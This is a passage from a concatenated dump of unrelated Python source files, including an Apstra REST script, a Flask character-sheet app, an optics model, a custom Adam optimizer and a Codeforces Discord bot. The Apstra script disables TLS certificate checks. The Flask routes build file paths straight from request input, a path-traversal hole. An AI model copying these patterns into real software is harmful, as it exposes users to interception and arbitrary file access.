\"\", \"mean\": 0, \"std\": 1, \"preprocess_func\": None}\n selector = ClearSelector(**params)\n","sub_path":"code/model_components/model_frame_selection.py","file_name":"model_frame_selection.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"422752637","text":"# MenuTitle: Tab with vertically shifted components\n# -*- coding: utf-8 -*-\n\nthisFont = Glyphs.font # frontmost font\nthisFontMaster = thisFont.selectedFontMaster # active master\nlistOfSelectedLayers = thisFont.selectedLayers # active layers of selected glyphs\n\nglyphList = []\n\nfor layer in listOfSelectedLayers:\n if hasattr(layer.parent, \"name\"):\n components = [\n component for component in layer.components if component.position.y != 0.0\n ]\n if len(components):\n glyphList.append(layer.parent.name)\n\n\nif len(glyphList):\n tabString = \"/\" + \"/\".join(glyphList)\n thisFont.newTab(tabString)\nelse:\n Message(\"Everything ok\", \"Not vertically shifted components\")\n","sub_path":"Tabs/Tab with vertically shifted components.py","file_name":"Tab with vertically shifted components.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"198880720","text":"\"\"\"\n# 중심 경향성( central tendency)\n: 대부분 평균(average)를 사용\n\"\"\"\nfrom typing import List\n\nnum_friends = [100, 49, 41, 40, 25 ] #... 등등 더 많은 데이터\n\ndef mean(xs: List[float]) -> float :\n return sum(xs) / len(xs)\n\nprint(mean(num_friends)) # 51.0\n \n\n\"\"\"\n# 중앙값 (median)\n : 전체 데이터에서 가장 중앙에 있는 데이터 포인트\n : 데이터가 짝수일 경우 - 가장 중앙에 있는 두 데이터 포인트의 평균\n\"\"\"\n# 밑줄 표시로 시작하는 함수는 프라이빗 함수를 의미하며\n# median 함수를 사용하는 사람이 직접 호출하는 것이 아닌\n# median 함수만 호출하도록 생성되었다.\n\ndef _median_odd(xs: List[float]) -> float:\n \"\"\"len(xs)가 홀수면 중앙값을 반환\"\"\"\n return sorted(xs)[len(xs)//2]\n\ndef _median_even(xs: List[float]) -> float:\n \"\"\"len(xs)가 짝수면 두 중앙값의 평균을 반환\"\"\"\n sorted_xs = sorted(xs)\n hi_midpoint = len(xs) // 2 # length =4, hi_midpoint =2\n return (sorted_xs[hi_midpoint - 1] + sorted_xs[hi_midpoint]) / 2\n\ndef median(v: List[float]) -> float:\n \"\"\"v의 중앙값을 계산\"\"\"\n return _median_even(v) if len(v) % 2 == 0 else _median_odd(v)\n\nassert median([1, 10, 2, 9, 5]) == 5\nassert median([1, 9, 2, 10]) == (2 + 9) / 2\n\nprint(median(num_friends)) # 41\n\n\n\"\"\"\n# 분위( quantile )\n: 중앙값을 포괄하는 개념\n: 특정 백분위 보다 낮은 분위에 속하는 데이터를 의미한다.\n\"\"\"\ndef quantile(xs : List[float], p: float) -> float:\n \"\"\"x의 p분위에 속하는 값을 반환\"\"\"\n p_index = int(p * len(xs))\n return sorted(xs)[p_index]\n\nprint(quantile(num_friends, 0.10)) # 25\nprint(quantile(num_friends, 0.25)) # 40\nprint(quantile(num_friends, 0.75)) # 49\nprint(quantile(num_friends, 0.90)) # 100\n\n\n\"\"\"\n# 최빈값( mode )\n : 데이터에서 가장 자주 나오는 값\n\"\"\"\nfrom collections import Counter\n\ndef mode(x: List[float]) -> List[float]:\n \"\"\"최빈값이 하나보다 많을수도 있으니 결과를 리스트로 반환\"\"\"\n counts = Counter(x)\n max_count = max(counts.values())\n return [x_i for x_i, count in counts.items()\n if count == max_count]\n\nx = [1, 1, 2, 3, 4, 5, 5, 5]\nprint(set(mode(x))) # {5}","sub_path":"homework/데이터 과학/p071_central_tendency.py","file_name":"p071_central_tendency.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"306078104","text":"import numpy as np\nimport optical_elements as oe\nimport matplotlib.pyplot as plt\n\n### pretense with oe\n\ndef intensity(theta1,theta3,theta4,theta2min, theta2max,l= np.array([1,0]), theta1error = 0.0, theta3error = 0.0, aeff = 0.1, beff = .1, ceff = .1, deff = 0.0):\n \n \"\"\"\n the intensity function represents how the intensity of the laser light changes as it goes through the interferometer set up.\n \n Parameters\n ----------\n theta1 : integer\n this is the rotation angle of the 1st half wave plate\n theta3 : integer\n this is the rotation angle of the 2nd half wave plate\n theta4 : integer\n angle of rotation for the polarizer between exiting light and detector\n theta2min : float\n minimum angle for the middle imperfect polarizer\n theta2max : float\n maximum angle for the middle imperfect polarizer\n \n theta1error : float\n human error for x1 angle\n theta3error : float\n human error for x2 angle\n aeff : float\n polarization leakage for 1st half waveplate polarizer set up\n beff : float\n polarization leakage for middle polarizer\n ceff : float\n polarization leakage for 2nd half waveplate polarizer set up\n deff : float\n polarization leakage for the polarizer inbetween the interferometer set up and the detector\n Returns\n -------\n type :\n the return value should be a range of intensities that are a result of the final intensity coming out of the set up\n with different polarization angles.\n \"\"\"\n \n #make a function that spits out whatever your lights going to be depending on polarization (nothing should be set since we can \n \"gives the intensity going to the dark port\"\n # l = laser light going into interferometer horizonatlly polarized\n acw = oe.hwp(-theta1) @ oe.pol(n=aeff) @ oe.hwp(theta1+theta1error) # polarizer 1 with light coming in at a clockwise direction ( HWP @ pol@ )make sure both HWP can have dif angles\n accw = oe.hwp(theta1+theta1error) @ oe.pol(n=aeff) @ oe.hwp(-theta1) # polarizer 1 with light coming in at a counterclockwise direction\n ccw = oe.hwp(-theta3) @ oe.pol(n=ceff) @ oe.hwp(theta3+theta3error) # polarizer 3 with light coming in at a clockwise direction\n cccw = oe.hwp(theta3+theta3error) @ oe.pol(n=ceff) @ oe.hwp(-theta3) # polarizer 3 with light coming in at a counterclockwise direction\n d = oe.rm(theta4,n= deff) # perfect polarizer between exiting light and detector\n # leave a space here because x2s defining array and above variables defining matrices\n theta2s = np.arange(theta2min,theta2max,.1) # making an array of all the different rotation angles of polarizer between set max and min angles\n\n @np.vectorize # even though give and return one value its going to take finc and make it work on an array of values\n def darkport_intensity(theta2):\n \"\"\n \n bcw = oe.rm(theta2,n=beff) # polarizer 2 with light coming in at a clockwise direction\n bccw = oe.rm(-theta2,n=beff) # polarizer 2 with light coming in at a counterclockwise direction\n b = ((accw@ bccw@ cccw-ccw@ bcw@ acw)/2)\n a = b.transpose()\n c = (l@(a) @d @ (b)@ l)\n return (c)\n \n \n return(theta2s,darkport_intensity(theta2s))\n\n\ndef vertical(theta1, theta3, theta2min, theta2max, ymax=0.2,aeff = aeff ,beff = beff ,ceff = ceff, deff = deff):\n \"this plots the the vertical light coming out of the dark port\"\n x2s,Vt = intensity(theta1,theta3,90,theta2min,theta2max,aeff,beff,ceff,deff)\n f=plt.figure(figsize=(4,3))\n\n plt.plot(x2s,Vt,color=\"purple\")\n plt.xlabel(r'$\\phi$ (deg)')\n plt.ylabel(r'$I_b/I_0$')\n plt.title('Vertical Dark Port Intensity vs Polarizer Angle')\n plt.grid(True)\n plt.xlim((theta2min,theta2max))\n plt.ylim((0,ymax))\n plt.show()\n \n\n\n\ndef horizontal(theta1,theta3,theta2min, theta2max, ymax=0.2,aeff = aeff,beff = beff ,ceff = ceff,deff = deff ):\n \"this plots the horizontal light coming out of the darkport\"\n x2s,Hz = intensity(theta1,theta3,0, theta2min, theta2max,aeff,beff,ceff,deff)\n f=plt.figure(figsize=(4,3))\n\n plt.plot(x2s,Hz,color=\"magenta\")\n plt.xlabel(r\"$\\phi$ (deg)\")\n plt.ylabel(r\"$I_d/I_0$\")\n plt.title(\"Horizontal Dark Port Intensity vs Polarizer Angle\")\n plt.grid(True)\n plt.xlim((theta2min,theta2max))\n plt.ylim((0,ymax))\n plt.show()\n\n\n\ndef split(theta1,theta3,theta2min, theta2max,aeff = aeff,beff = beff ,ceff = ceff,deff = deff):\n \"bright port minus dark ratio to total initial intensity\"\n\n x2s,Vt = intensity(theta1,theta3,90,theta2min, theta2max,aeff,beff,ceff,deff)\n x2s,Hz = intensity(theta1,theta3,0,theta2min, theta2max,aeff,beff,ceff,deff)\n s = Vt-Hz / (Hz+Vt)\n f=plt.figure(figsize=(4,3))\n\n plt.plot(x2s,s,color=\"aqua\")\n plt.xlabel(r'$\\phi$ (deg)')\n plt.ylabel(r'$(I_v-I_h)/(I_h+I_v)$')\n plt.title('Dark Port Intensity Difference')\n plt.xlim((theta2min,theta2max))\n plt.grid(True)\n plt.show()","sub_path":"interferometer.py","file_name":"interferometer.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"598145786","text":"import math\nimport torch\nfrom torch.optim.optimizer import Optimizer\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nclass Adam(Optimizer):\n def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,\n weight_decay=0):\n # Invalid input parameters raise error\n if not 0.0 <= lr:\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\n if not 0.0 <= eps:\n raise ValueError(\"Invalid epsilon value: {}\".format(eps))\n if not 0.0 <= betas[0] < 1.0:\n raise ValueError(\"Invalid beta parameter at index 0: {}\".format(betas[0]))\n if not 0.0 <= betas[1] < 1.0:\n raise ValueError(\"Invalid beta parameter at index 1: {}\".format(betas[1]))\n defaults = dict(lr=lr, betas=betas, eps=eps,\n weight_decay=weight_decay)\n super(Adam, self).__init__(params, defaults)\n\n def __setstate__(self, state):\n super(Adam, self).__setstate__(state)\n\n def step(self):\n loss = None\n for group in self.param_groups:\n # Actually, only one group\n # group = {'params': ...,\n # 'lr': 0.001,\n # 'betas': (0.9, 0.999),\n # ...}\n for p in group['params']:\n if p.grad is None:\n continue\n grad = p.grad.data\n state = self.state[p] # initially, state = {}\n # State initialization\n if len(state) == 0:\n state['step'] = 0\n # Exponential moving average of gradient values\n state['exp_avg'] = torch.zeros_like(p.data)\n # Exponential moving average of squared gradient values\n state['exp_avg_sq'] = torch.zeros_like(p.data)\n\n exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']\n beta1, beta2 = group['betas']\n\n state['step'] += 1\n\n if group['weight_decay'] != 0:\n grad.add_(group['weight_decay'], p.data)\n\n # Decay the first and second moment running average coefficient\n exp_avg.mul_(beta1).add_(1 - beta1, grad)\n exp_avg_sq.mul_(beta2).addcmul_(1 - beta2, grad, grad)\n denom = exp_avg_sq.sqrt().add_(group['eps'])\n\n bias_correction1 = 1 - beta1 ** state['step']\n bias_correction2 = 1 - beta2 ** state['step']\n step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1\n\n p.data.addcdiv_(-step_size, exp_avg, denom)\n\n return loss\ndef num_flat_features(x):\n size = x.size()[1:] # all dimensions except the batch dimension\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\nclass FC(nn.Module):\n def __init__(self, activation=\"relu\", drop_rate=0):\n super(FC, self).__init__()\n self.activation = activation\n self.drop_rate = drop_rate\n self.type = 'fc'\n self.fc1 = nn.Linear(784, 1000)\n self.fc2 = nn.Linear(1000, 1000)\n self.fc3 = nn.Linear(1000, 10)\n self.activations = nn.ModuleDict([\n ['relu', nn.ReLU()],\n ['sigmoid', nn.Sigmoid()]\n ])\n if self.drop_rate:\n self.input_dropout = nn.Dropout(0.2)\n self.dropout = nn.Dropout(self.drop_rate)\n\n def forward(self, x):\n x = x.view(-1, num_flat_features(x)) #flattened input 64 x 64 = 784\n if self.drop_rate:\n x = self.input_dropout(x)\n x = self.activations[self.activation](self.fc1(x))\n if self.drop_rate:\n x = self.dropout(x)\n x = self.activations[self.activation](self.fc2(x))\n if self.drop_rate:\n x = self.dropout(x)\n x = self.activations[self.activation](self.fc3(x))\n return F.log_softmax(x, dim=1)\n\nif __name__ == '__main__':\n use_cuda = torch.cuda.is_available()\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n dataset = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=128, shuffle=True, **kwargs)\n model = FC().to(device)\n optimizer = Adam(model.parameters())\n for input, target in dataset:\n input, target = input.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(input)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n break\n","sub_path":"adam/adam.py","file_name":"adam.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"206844569","text":"# --- import ---\nimport common\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nimport json\nimport sys\n\nahost = common.args[1]\nl = common.blueprint()\ntoken = l[0]\nbp_id = l[1]\nbp_qe_post_system_systemtype = common.bp_qe_post_system_systemtype(token, bp_id)\ndeploy_mode = common.deploy_mode\n\n# Get node id list (server) and patch deploy mode\ndef patch_deploy_mode():\n # Create payload\n input_mode = input('deploy_mode:')\n if input_mode in deploy_mode:\n payload = {'nodes': {}}\n for i in bp_qe_post_system_systemtype['items']:\n payload['nodes'][i['system']['id']] = {'deploy_mode':input_mode}\n else:\n print ('Error: Wrong deploy mode')\n sys.exit()\n # Patch deploy mode\n ep = 'https://' + ahost + '/api/blueprints/{blueprint_id}'.format(blueprint_id = bp_id)\n requests.patch(ep, headers={'AUTHTOKEN':token, 'Content-Type':'application/json'}, data=json.dumps(payload), verify=False)\n\npatch_deploy_mode()\n","sub_path":"library/patch_deploy_mode_server.py","file_name":"patch_deploy_mode_server.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"594745980","text":"dic = dict()\n\nwith open(r\"E:\\LPF\\2017\\KGL-ratio-1.gene2effect.np\",\"r\") as f:\n data = f.readlines() \n for line in data:\n line.strip().replace(' ', '').replace('\\n', '').replace('\\t', '').replace('\\r', '').strip()\n key=line.split(\"\\t\")[0]\n value=line.split(\"\\t\")[1]\n if key in dic.keys():\n dic[key].append(value)\n else:\n dic[key] = [value]\n print(dic)\nf6 = open(r\"E:\\LPF\\2017\\KGL-ratio-1.gene2effect.final.np\",'w+')\nfor key in dic:\n #f6.write(key+'\\t'+ ' '.join(str(i).replace('\\n',\"\") for i in dic[key])+'\\n')\n sum=0\n for i in dic[key]:\n sum+=abs(float(i))\n f6.write(key+'\\t'+ str(sum)+'\\n')\nf6.close()","sub_path":"mergeDuplicate+sum.py","file_name":"mergeDuplicate+sum.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"630464790","text":"# Uses python3\nimport sys\n\ndef get_optimal_value(capacity, weights, values):\n value = 0.\n # get value per unit\n v_u = [(v, w, v/w) for w, v in zip(weights, values)]\n v_u = sorted(v_u, key=lambda x: x[2], reverse = True)\n\n for idx in range(len(v_u)):\n if capacity == 0:\n return value\n \n a = min(v_u[idx][1], capacity)\n value = value + a*v_u[idx][2]\n capacity -= a\n\n return value\n\n\nif __name__ == \"__main__\":\n data = list(map(int, sys.stdin.read().split()))\n n, capacity = data[0:2]\n values = data[2:(2 * n + 2):2]\n weights = data[3:(2 * n + 2):2]\n opt_value = get_optimal_value(capacity, weights, values)\n print(\"{:.10f}\".format(opt_value))\n","sub_path":"algorithmic-toolbox/week3_greedy_algorithms/fractional_knapsack.py","file_name":"fractional_knapsack.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"76436048","text":"from flask import Flask\nfrom flask import jsonify\nfrom flask import request\nfrom flask import json\nimport json\n\nimport os #This is for list of files and directories\napp = Flask(__name__)\n\n\n@app.route('/')\ndef landing():\n with open('landing.html') as f:\n read_data = f.read()\n return read_data\n \n@app.route('/test')\ndef read_file():\n with open('test.html') as f:\n read_data = f.read()\n return read_data\n\n \n@app.route('/form')\ndef form_file():\n with open('form.txt') as f:\n read_data = f.read()\n return read_data\n \n \n \n@app.route('/character', methods=['POST'])\ndef character():\n print (\"test CHARS\")\n data = \"\"\n data_loaded = \"\"\n sel = request.get_json()\n with open('json_demo.json', 'r') as json_file:\n data = json_file.read()\n data_loaded = json.loads(data)\n \n\n \n if (data_loaded['character'][sel['tar']]['health'] >= 4):\n data_loaded['character'][sel['tar']]['health'] = 4\n else:\n data_loaded['character'][sel['tar']]['health'] += 1\n\n \n with open('json_demo.json', 'w') as json_file:\n json.dump(data_loaded, json_file)\n\n print (data_loaded['character'][sel['tar']])\n return jsonify(data_loaded['character'][sel['tar']])\n \n@app.route('/characterNewX', methods=['POST'])\ndef characterNewX():\n data = request.get_json()\n print (data.get('name', ''))\n data_loaded = \"\"\n with open('json_demo.json', 'r') as json_file:\n data_loaded = json.loads(json_file.read())\n print (data)\n print (data_loaded['character'])\n data_loaded['character'].append(data)\n \n with open('json_demo.json', 'w') as json_file:\n json.dump(data_loaded, json_file)\n \n return ('', 200)\n \n@app.route('/characterHide', methods=['POST'])\ndef characterHide():\n arr = os.listdir(\"chars\")\n listString = \"\"\n for member in arr:\n listString += member.replace('.json', '') + \",\"\n listString = listString[:-1]\n \n return listString\n \n\n@app.route('/characterEx')\ndef characterEx():\n with open('characterEx.html') as f:\n read_data = f.read()\n return read_data\n \n@app.route('/characterLoad', methods=['POST'])\ndef characterLoad():\n char = request.args.get('char')\n data = \"\"\n print (char)\n \n with open(\"chars/\" + char + \".json\", 'r') as json_file:\n data = json_file.read()\n data = json.loads(data)\n \n print (data)\n return data\n \n@app.route('/characterHealthInc', methods=['POST'])\ndef characterHealthInc():\n char = request.args.get('char')\n data = \"\"\n print (char)\n \n with open(\"chars/\" + char + \".json\", 'r') as json_file:\n data = json_file.read()\n data = json.loads(data)\n \n if (data['health'] >= 4):\n data['health'] = 4\n else:\n data['health'] += 1\n print (data)\n with open(\"chars/\" + char + \".json\", 'w') as json_file:\n json.dump(data, json_file)\n return data\n \n \n@app.route('/characterHealthDec', methods=['POST'])\ndef characterHealthDec():\n char = request.args.get('char')\n data = \"\"\n print (char)\n \n with open(\"chars/\" + char + \".json\", 'r') as json_file:\n data = json_file.read()\n data = json.loads(data)\n \n if (data['health'] <= 0):\n data['health'] = 0\n else:\n data['health'] -= 1\n print (data)\n with open(\"chars/\" + char + \".json\", 'w') as json_file:\n json.dump(data, json_file)\n return data\n \n@app.route('/characterNew')\ndef characterNew():\n char = request.args.get('char')\n data = \"\"\n with open(\"charsTemplates/\" + char + \".html\", 'r') as f:\n data = f.read()\n return data\n \n@app.route('/characterSave', methods=['POST'])\ndef characterSave():\n char = request.args.get('char')\n data = request.get_json()\n\n print (os.path.isfile(\"chars/\" + char + \".json\"))\n if (os.path.isfile(\"chars/\" + char + \".json\") == False):\n with open(\"chars/\" + char + \".json\", 'w') as json_file:\n json.dump(data, json_file) \n return ('ok')\n else:\n return ('bad')\n \n@app.route('/merc')\ndef merc():\n with open('charsTemplates\\mercenary.html') as f:\n read_data = f.read()\n return read_data\n \n#Create a template function for new character creation\n#Create a processing function for each file","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"567823872","text":"import scrapy\nclass Test(scrapy.Spider):\n name = \"cornell\"#定义蜘蛛名\n start_urls=['https://www.cs.cornell.edu/~cristian/Cornell_Movie-Dialogs_Corpus.html']#要爬取的网址\n def start_requests(self):\n #定义要爬取的链接\n urls = ['https://www.cs.cornell.edu/~cristian/Cornell_Movie-Dialogs_Corpus.html']\n for url in urls:\n yield scrapy.Request(url=url,callback=self.parse)#爬取的页面交给parse方法进行处理\n def parse(self, response):\n datas1 = response.xpath('//*[@id=\"id1\"]/div/div/p/text()').extract()\n datas2 = response.xpath('//*[@id=\"id2\"]/div/div/p/text()').extract()\n filename1=\"movie_lines.txt\"\n filename2=\"movie_conversations.txt\"\n with open(filename1, 'w',encoding='utf-8') as f1:\n for each_data1 in datas1:\n f1.write(each_data1)\n f1.write(\"\\n\")\n f1.close()\n\n with open(filename2, 'w', encoding='utf-8') as f2:\n for each_data2 in datas2:\n f2.write(each_data2)\n f2.write(\"\\n\")\n f2.close()\n","sub_path":"cornellScrapy/cornellScrapy/spiders/cornell.py","file_name":"cornell.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"554790030","text":"import random\nimport sys\nimport time\nimport numpy as np\nfrom collections import deque\nimport argparse\n\nV = set()\nS = set()\n\n\n\ndef R_v(adj, v, former_temp):\n temp = set()\n if not(v in former_temp):\n temp.add(v)\n s_temp = set({v})\n while s_temp:\n a = set()\n for i in s_temp:\n if not(i in adj):\n continue\n for j in adj[i]:\n if not(j in temp) and not(j in former_temp): \n temp.add(j)\n a.add(j)\n s_temp = a\n return len(temp)\n\ndef R_first_v(adj, v):\n temp = set({v})\n s_temp = set({v})\n while s_temp:\n a = set()\n for i in s_temp:\n if not(i in adj):\n continue\n for j in adj[i]:\n if not(j in temp): \n temp.add(j)\n a.add(j)\n s_temp = a\n return len(temp)\n\ndef cal_R(adj, S):\n temp = set()\n s_temp = S.copy()\n temp = temp | s_temp\n while s_temp:\n a = set()\n for i in s_temp:\n if not(i in adj):\n continue\n for j in adj[i]:\n b = random.random()\n if b < 0.01 and not(j in temp):\n temp.add(j)\n a.add(j)\n s_temp = a\n\n return len(temp)\n\ndef R_S(adj, v, former_temp):\n s_temp = set()\n if v == 1000000:\n return 0\n s_temp.add(v)\n former_temp.add(v)\n while s_temp:\n a = set()\n for i in s_temp:\n if not(i in adj):\n continue\n for j in adj[i]:\n if not(j in former_temp): \n former_temp.add(j)\n a.add(j)\n s_temp = a\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-k', type=int, default=None)\n parser.add_argument('-dat', type=str, default=None)\n args = parser.parse_args()\n\n K = args.k\n graph_file = args.dat\n\n t_start = time.time()\n f = open(graph_file,\"r\")\n\n adj={}\n G = []\n cnt = 0\n fr = f.readlines()\n all_num = int(fr[0].split(\" \")[1])\n print(all_num)\n for i in range(100):\n G.append({})\n for line in fr[1:]:\n a = line.split('\\r')[0].split(' ')\n b = int(a[0])\n c = int(a[1])\n if not(b in adj):\n adj[b] = [] \n adj[b].append(c)\n for j in range(100):\n if random.random() < 0.01:\n if not(b in G[j]):\n G[j][b] = []\n G[j][b].append(c)\n if not(c in adj):\n adj[c] = [] \n adj[c].append(b)\n for j in range(100):\n if random.random() < 0.01:\n if not(c in G[j]):\n G[j][c] = []\n G[j][c].append(b)\n t_adj = time.time()\n print(\"generating adj time: \", t_adj - t_start)\n V = set(adj.keys())\n print(\"Finishing generating Gi!\")\n\n influence_dict = {}\n\n for i in V:\n num = 0 \n for j in G:\n num += R_first_v(j, i)\n influence_dict[i] = num\n print(\"cal_time: \", time.time() - t_adj)\n order = sorted(influence_dict, key = lambda a: influence_dict[a], reverse=True)\n former_temp = []\n for i in range(len(G)):\n former_temp.append(set())\n S.add(order[0])\n print(\"step: \", 0, \"num\", influence_dict[order[0]], \"S\", S)\n for j in range(len(G)):\n R_S(G[j], order[0], former_temp[j])\n influence_dict.pop(order[0])\n order.remove(order[0])\n for i in range(K-1):\n k = 0\n index_ = 0\n maximum = 0\n while 1:\n v = order[k]\n num = 0\n for j in range(len(G)):\n num += R_v(G[j], v, former_temp[j])\n \n influence_dict[v] = num\n if num > maximum:\n maximum = num\n index = k\n influence_dict[v] = num\n if influence_dict[order[k]] < influence_dict[order[k + 1]]:\n k += 1\n else:\n break\n \n if maximum > influence_dict[order[k + 1]]:\n k = index\n break\n S.add(order[k])\n for j in range(len(G)):\n R_S(G[j], order[k], former_temp[j])\n \n print(\"step: \", i + 1, \"num\", influence_dict[order[k]], \"S\", S)\n influence_dict.pop(order[k])\n order = sorted(influence_dict, key = lambda a: influence_dict[a], reverse=True)\n\n t_finds = time.time()\n t = t_finds - t_start\n print(\"Time: \", t)\n print(S)\n \n cnt = 0\n for i in range(10000):\n cnt += cal_R(adj, S) \n cnt /= 10000\n \n print(\"influence: \", cnt)\n print(\"cal_time: \", time.time() - t_finds)\n \n \n \n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"sg/StaticGreedyCELF_undirected_UIC.py","file_name":"StaticGreedyCELF_undirected_UIC.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"491753879","text":"#!/usr/bin/env python\n\nfrom datetime import datetime\nimport logging\nimport numpy as np\nfrom .base import FractTrader, FractTradeHelper\n\n\nclass KalmanFilter:\n def __init__(self, x_hat0, v_err0, v_sys_err, v_obs_err):\n self.x_hat = np.array([x_hat0]) # a posteri estimate of x\n self.v_err = np.array([v_err0]) # a posteri error estimate\n self.v_sys_err = v_sys_err # process variance\n self.v_obs_err = v_obs_err # estimate of measurement variance\n\n def update(self, x):\n x_hat_m = self.x_hat[-1] # a priori estimate of x\n v_err_m = self.v_err[-1] + self.v_sys_err # a priori error estimate\n k = v_err_m / (v_err_m + self.v_obs_err) # gain or blending factor\n self.x_hat = np.append(self.x_hat, x_hat_m + k * (x - x_hat_m))\n self.v_err = np.append(self.v_err, (1 - k) * v_err_m)\n return self.x_hat[-1]\n\n def update_offline(self, x_array):\n [self.update(x=x) for x in x_array]\n return self.x_hat[-1]\n\n\nclass Kalman(FractTrader):\n def __init__(self, oanda, margin_ratio, model, quiet=False):\n super().__init__(oanda=oanda,\n margin_ratio=margin_ratio,\n model=model,\n quiet=quiet)\n\n def _kalman_filter(self, window):\n return (\n lambda v0:\n KalmanFilter(\n x_hat0=window['midpoints'][0],\n v_err0=v0,\n v_sys_err=v0 * self.model['error']['sys_var'],\n v_obs_err=v0 * self.model['error']['obs_var']\n )\n )(\n v0=window['midpoints'][\n -int(self.model['error']['ref_window']):\n ].var(ddof=1)\n )\n\n def fire(self, instrument):\n t0 = datetime.now()\n rate = self._get_rate(instrument=instrument)\n logging.debug('rate: {}'.format(rate))\n helper = FractTradeHelper(name=self.__class__.__name__,\n instrument=instrument,\n quiet=self.quiet)\n\n if rate['halted']:\n helper.print_log('Skip for trading halted.')\n helper.sleep(last=t0, sec=0.5)\n else:\n prices = self._get_prices()\n logging.debug('prices: {}'.format(prices))\n helper.sleep(last=t0, sec=0.5)\n\n units = self._calc_units(rate=rate,\n prices=prices,\n margin=self._get_margin())\n logging.debug('units: {}'.format(units))\n helper.sleep(last=t0, sec=1)\n\n if units == 0:\n helper.print_log('Skip for lack of margin.')\n else:\n wi = self._get_window(instrument=instrument)\n ws = self._calc_window_stat(window=wi)\n logging.debug('ws: {}'.format(ws))\n\n max_spread = ws['std'] * self.model['sigma']['max_spread']\n logging.debug('max_spread: {}'.format(max_spread))\n\n if prices[instrument]['spread'] > max_spread:\n helper.print_log('Skip for large spread.')\n else:\n kf = self._kalman_filter(window=wi)\n kf.update_offline(x_array=wi['midpoints'])\n logging.debug('kf.x_hat: {}'.format(kf.x_hat))\n\n x_delta = np.float32(kf.x_hat[-1] - kf.x_hat[-2])\n threshold = np.float32(\n ws['std'] * self.model['sigma']['entry_trigger']\n )\n logging.debug('x_delta: {0}, threshold: {1}'.format(\n x_delta, threshold\n ))\n\n if x_delta - threshold > 0:\n helper.print_order_log(\n response=self._place_order(sd=ws['std'],\n prices=prices,\n rate=rate,\n side='buy',\n units=units)\n )\n elif x_delta + threshold < 0:\n helper.print_order_log(\n response=self._place_order(sd=ws['std'],\n prices=prices,\n rate=rate,\n side='sell',\n units=units)\n )\n else:\n helper.print_log('Skip by the criteria.')\n\n return rate\n","sub_path":"fract/model/kalman.py","file_name":"kalman.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"617879029","text":"import io\nimport os\nimport time\nimport datetime\nimport random\n\nimport aiohttp\nfrom matplotlib import pyplot as plt\n\nimport discord\nfrom discord.ext import commands\n\nfrom tle.cogs.util import codeforces_api as cf\n\nclass Codeforces(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(brief='Recommend a problem')\n async def gitgud(self, ctx, handle: str, delta : int = 0, tag : str = 'all'):\n \"\"\"Recommends a problem based on Codeforces rating of the handle provided.\"\"\"\n\n def round_rating(rating):\n rem = rating % 100\n rating -= rem\n return rating + 100 if rem >= 50 else rating\n\n try:\n probresp = await cf.problemset.problems()\n inforesp = await cf.user.info(handles=[handle])\n subsresp = await cf.user.status(handle=handle)\n except aiohttp.ClientConnectionError:\n await ctx.send('Error connecting to Codeforces API')\n return\n except cf.NotFoundError:\n await ctx.send(f'Handle not found: `{handle}`')\n return\n except cf.CodeforcesApiError:\n await ctx.send('Codeforces API denied the request, please make the handle is valid.')\n return\n\n user_rating = inforesp[0].get('rating')\n if user_rating is None:\n # Assume unrated is noob\n user_rating = 500\n user_rating = round_rating(user_rating + delta)\n problems = probresp['problems']\n recommendations = {}\n for problem in problems:\n if '*special' not in problem['tags'] and problem.get('rating') == user_rating:\n if 'contestId' in problem and (tag == 'all' or tag in problem['tags']):\n name = problem['name']\n contestid = problem['contestId']\n index = problem['index']\n rating = problem['rating']\n # Consider (name, rating) as key\n recommendations[(name, rating)] = (contestid, index)\n\n for sub in subsresp:\n problem = sub['problem']\n if sub['verdict'] == 'OK' and 'rating' in problem:\n name = 